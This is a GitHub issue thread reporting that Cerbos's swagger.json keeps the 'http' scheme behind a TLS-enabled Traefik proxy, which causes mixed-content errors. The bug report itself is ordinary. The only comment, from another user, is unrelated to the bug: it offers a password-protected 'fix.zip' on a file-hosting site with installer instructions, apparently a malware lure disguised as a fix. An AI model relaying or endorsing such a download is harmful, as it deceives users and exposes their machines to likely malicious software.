### ISSUE TITLE
Unable to obtain the HTTP Schema of the reverse proxy

### ISSUE THREAD

**Issue by jinrenjie** [cerbos/cerbos#2299]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

I used Traefik to reverse proxy Cerbos and enabled TLS on the Traefik side, but the `schemes` in the obtained `/schema/swagger.json` is still http.

This caused me to receive a blocked:mixed-content error when trying to request the API in the UI. I tried to send an HTTP request under the HTTPS page, and the request could not be sent normally!

### Expected Behavior

The `schemes` in `/schema/swagger.json` should be consistent with the outermost HTTP Scheme!

### Steps To Reproduce

1. Use Traefik to reverse proxy Cerbos
2. Enable HTTPS for Cerbos reverse proxy
3. Visit https://CERBOS_DOMAIN
4. Try to request the API in API Explorer

### Environment

```markdown
- OS: macOS Sonoma 14.6.1
- Cerbos version: v0.38.1
- Docker version: 26.1.4
- Go version: go1.21.10
```

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
